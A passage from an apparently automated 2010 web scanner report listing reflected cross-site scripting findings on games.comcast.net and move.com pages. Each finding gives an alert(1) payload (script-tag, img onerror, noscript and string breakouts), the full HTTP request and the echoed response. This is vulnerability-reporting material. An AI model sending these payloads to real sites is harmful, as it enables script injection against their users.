Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s1b97f0</noscript><script>alert(1)</script>63f4f408e40/DownloadableGames was not found on this server.</p>
...[SNIP]...

2.49. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71d13"><img%20src%3da%20onerror%3dalert(1)>25e360604eb was submitted in the REST URL parameter 1. This input was echoed as 71d13"><img src=a onerror=alert(1)>25e360604eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /t_03cm71d13"><img%20src%3da%20onerror%3dalert(1)>25e360604eb/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:06 GMT
Server: Apache
Set-Cookie: ssid=9kfocedqu60qtq9gs61t22ojc3; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:06 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:06 GMT; path=/
Set-Cookie: affiliate_code=t_03cm71d13%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E25e360604eb; expires=Fri, 17-Jun-2011 18:08:06 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1107339456.20480.0000; path=/
Content-Length: 30063

   
                                                                                                                                                                                                                                                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm
...[SNIP]...
<a onclick="passReport('download');" href="http://d.trymedia.com/d/terminalstudio/dip_60m_en/t_03cm71d13"><img src=a onerror=alert(1)>25e360604eb/AtlantisBundle.rga?curr_selected=USD&lang=en" class="dlFirst button">
...[SNIP]...

2.50. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload cad9b</noscript><script>alert(1)</script>6d1d2cde714 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /cad9b</noscript><script>alert(1)</script>6d1d2cde714/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:17 GMT
Server: Apache
Set-Cookie: ssid=57ia8n32bvthj735oc230jm0g5; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:17 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:17 GMT; path=/
Content-Length: 663
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /cad9b</noscript><script>alert(1)</script>6d1d2cde714/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html was not found on this server.</p>
...[SNIP]...

2.51. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload 23787</noscript><script>alert(1)</script>34b01fab478 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s1_1050_1367523787</noscript><script>alert(1)</script>34b01fab478/DownloadableGames/Puzzle/Atlantis-Bundle.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:34 GMT
Server: Apache
Set-Cookie: ssid=dkrukt8915gi49v33gjhl0cq40; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:34 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:34 GMT; path=/
Content-Length: 669
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s1_1050_1367523787</noscript><script>alert(1)</script>34b01fab478/DownloadableGames/Puzzle/Atlantis-Bundle.html was not found on this server.</p>
...[SNIP]...

2.52. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3063"><img%20src%3da%20onerror%3dalert(1)>6a42dc0ab56 was submitted in the REST URL parameter 1. This input was echoed as f3063"><img src=a onerror=alert(1)>6a42dc0ab56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /t_03cmf3063"><img%20src%3da%20onerror%3dalert(1)>6a42dc0ab56/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:13 GMT
Server: Apache
Set-Cookie: ssid=h0nrl48tg0guhk13n8ltacb3h0; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:13 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:14 GMT; path=/
Set-Cookie: affiliate_code=t_03cmf3063%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6a42dc0ab56; expires=Fri, 17-Jun-2011 18:08:14 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=889235648.20480.0000; path=/
Content-Length: 29284

   
                                                                                                                                                                                                                                                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm
...[SNIP]...
<a onclick="passReport('download');" href="http://d.trymedia.com/d/ludia/dip_nt_en/t_03cmf3063"><img src=a onerror=alert(1)>6a42dc0ab56/PressYourLuck.rga?curr_selected=USD&lang=en" class="dlFirst button">
...[SNIP]...

2.53. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload e089a</noscript><script>alert(1)</script>951348d9f29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /e089a</noscript><script>alert(1)</script>951348d9f29/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:23 GMT
Server: Apache
Set-Cookie: ssid=sr7vraqja24ch6vd8b0pobha84; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:23 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:23 GMT; path=/
Content-Length: 665
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1241557184.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /e089a</noscript><script>alert(1)</script>951348d9f29/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html was not found on this server.</p>
...[SNIP]...

2.54. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload eeb6a</noscript><script>alert(1)</script>c4670f56420 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s1_1052_14739eeb6a</noscript><script>alert(1)</script>c4670f56420/DownloadableGames/Action/Press-Your-LuckTM.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache
Set-Cookie: ssid=utmgdutu5fcvcod3ovdibp5s64; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:39 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:39 GMT; path=/
Content-Length: 671
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1241557184.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s1_1052_14739eeb6a</noscript><script>alert(1)</script>c4670f56420/DownloadableGames/Action/Press-Your-LuckTM.html was not found on this server.</p>
...[SNIP]...

2.55. http://games.comcast.net/t_03cm/s2/WebGames [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s2/WebGames

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 73e24</noscript><script>alert(1)</script>fec4c25f5cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /73e24</noscript><script>alert(1)</script>fec4c25f5cb/s2/WebGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:09:26 GMT
Server: Apache
Set-Cookie: ssid=jf8r2ipsolnif7g17h7m327g65; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:09:26 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:09:26 GMT; path=/
Content-Length: 615
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=570534080.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /73e24</noscript><script>alert(1)</script>fec4c25f5cb/s2/WebGames was not found on this server.</p>
...[SNIP]...

2.56. http://games.comcast.net/t_03cm/s2/WebGames [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s2/WebGames

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload 8bce2</noscript><script>alert(1)</script>5b386e009e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s28bce2</noscript><script>alert(1)</script>5b386e009e3/WebGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:09:39 GMT
Server: Apache
Set-Cookie: ssid=s8tpq3a2d6nmt2277sqjgub284; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:09:39 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:09:39 GMT; path=/
Content-Length: 621
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1241557184.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s28bce2</noscript><script>alert(1)</script>5b386e009e3/WebGames was not found on this server.</p>
...[SNIP]...

2.57. http://games.comcast.net/t_03cm/s6/filter-casual/MacGames [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s6/filter-casual/MacGames

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload dc5c1</noscript><script>alert(1)</script>22c38537d71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /dc5c1</noscript><script>alert(1)</script>22c38537d71/s6/filter-casual/MacGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:11:18 GMT
Server: Apache
Set-Cookie: ssid=bd1con7p94do1s3jm7bhu9gk82; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:11:18 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:11:18 GMT; path=/
Content-Length: 629
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1107339456.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /dc5c1</noscript><script>alert(1)</script>22c38537d71/s6/filter-casual/MacGames was not found on this server.</p>
...[SNIP]...

2.58. http://games.comcast.net/t_03cm/s6/filter-casual/MacGames [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s6/filter-casual/MacGames

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload b1b9d</noscript><script>alert(1)</script>4a6c6e6c8c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s6b1b9d</noscript><script>alert(1)</script>4a6c6e6c8c9/filter-casual/MacGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:11:34 GMT
Server: Apache
Set-Cookie: ssid=ii7uo2kh80idg52kfki2hku1b4; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:11:34 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:11:34 GMT; path=/
Content-Length: 635
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=570534080.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s6b1b9d</noscript><script>alert(1)</script>4a6c6e6c8c9/filter-casual/MacGames was not found on this server.</p>
...[SNIP]...

2.59. http://moving.move.com/Move/Moving/Default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://moving.move.com
Path:   /Move/Moving/Default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de42a</script><script>alert(1)</script>185f2068544 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Move/Moving/Default.asp?de42a</script><script>alert(1)</script>185f2068544=1 HTTP/1.1
Host: moving.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 19 Dec 2010 18:13:14 GMT
X-Powered-By: ASP.NET
Content-Length: 39615
Content-Type: text/html
Set-Cookie: DART=AdPops=move%7C%3A%3A12%2F19%2F2010+11%3A28%3A15+AM; expires=Mon, 19-Dec-2011 18:13:14 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<!-- Not @ HOMS -->
<!-- homestore.comMOV/move/moving/default.asp@ -->

<html>
<head>
<tit
...[SNIP]...
valid Zip Code');
               form.Zip.focus();    
               isValid = false;
           }        
}
       if (isValid==true){
           form.action = form.action + '&Showzip=' + form.Zip.value +'&' + arrLinks[intMoveType] + '&' + 'de42a</script><script>alert(1)</script>185f2068544=1';
           form.submit();
           if(document.mover.MoveType.value==2)
           isValid=false;        }

       return isValid;
       
   }
   function validateUSZip( strValue ) {
       /******************************************
...[SNIP]...

2.60. http://moving.move.com/move/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://moving.move.com
Path:   /move/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6723'-alert(1)-'369fa1d63f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /move/?d6723'-alert(1)-'369fa1d63f=1 HTTP/1.1
Host: moving.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 19 Dec 2010 18:13:13 GMT
X-Powered-By: ASP.NET
Content-Length: 69841
Content-Type: text/html
Set-Cookie: DART=AdPops=move%7C%3A%3A12%2F19%2F2010+11%3A28%3A13+AM; expires=Mon, 19-Dec-2011 18:13:14 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<!-- Not @ HOMS -->
<!-- homestore.comMOV/move/default.asp@ -->

<html>
<head>
<title>
Mo
...[SNIP]...
){
                                       document.mquoteform.action = document.mquoteform.action + '&Showzip=' + document.mquoteform.Zip.value + '&MDate=' + document.mquoteform.MDate.value + '&' + arrLinks[intMoveType] + '&' + 'd6723'-alert(1)-'369fa1d63f=1';
                                       document.mquoteform.submit();
                                       if(document.mquoteform.MoveType.value==2)
                                            isValid=false;
                                       
                                   }
                                   return isValid;
                               }
                               fun
...[SNIP]...

2.61. http://moving.move.com/move/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://moving.move.com
Path:   /move/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be453'-alert(1)-'aa41f058865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /move/default.asp?be453'-alert(1)-'aa41f058865=1 HTTP/1.1
Host: moving.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 19 Dec 2010 18:13:14 GMT
X-Powered-By: ASP.NET
Content-Length: 69842
Content-Type: text/html
Set-Cookie: DART=AdPops=move%7C%3A%3A12%2F19%2F2010+11%3A28%3A14+AM; expires=Mon, 19-Dec-2011 18:13:14 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<!-- Not @ HOMS -->
<!-- homestore.comMOV/move/default.asp@ -->

<html>
<head>
<title>
Mo
...[SNIP]...
){
                                       document.mquoteform.action = document.mquoteform.action + '&Showzip=' + document.mquoteform.Zip.value + '&MDate=' + document.mquoteform.MDate.value + '&' + arrLinks[intMoveType] + '&' + 'be453'-alert(1)-'aa41f058865=1';
                                       document.mquoteform.submit();
                                       if(document.mquoteform.MoveType.value==2)
                                            isValid=false;
                                       
                                   }
                                   return isValid;
                               }
                               fun
...[SNIP]...

2.62. http://newhomes.move.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 654a4"><script>alert(1)</script>8b33e015dd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?654a4"><script>alert(1)</script>8b33e015dd7=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:19 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=o5vq4czwk254vfmssftqyijg; path=/; HttpOnly
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:19 GMT; path=/
Set-Cookie: Personal333=; expires=Mon, 19-Dec-2011 18:22:19 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 35302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang=
...[SNIP]...
gnIn" href="/Login/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('//LoginModal','http://newhomes.move.com/Default.aspx?654a4"><script>alert(1)</script>8b33e015dd7=1','//LoginModal/popupwindow-true','PPWINSHOW',333)}, function(){SdcAjaxLog('//LoginModal','http://newhomes.move.com/Default.aspx?654a4">
...[SNIP]...

2.63. http://newhomes.move.com/comcast/communityresults/market-100/city-elgin [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-100/city-elgin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e94"><script>alert(1)</script>d77209e2310 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-100/city-elgin?94e94"><script>alert(1)</script>d77209e2310=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:50 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
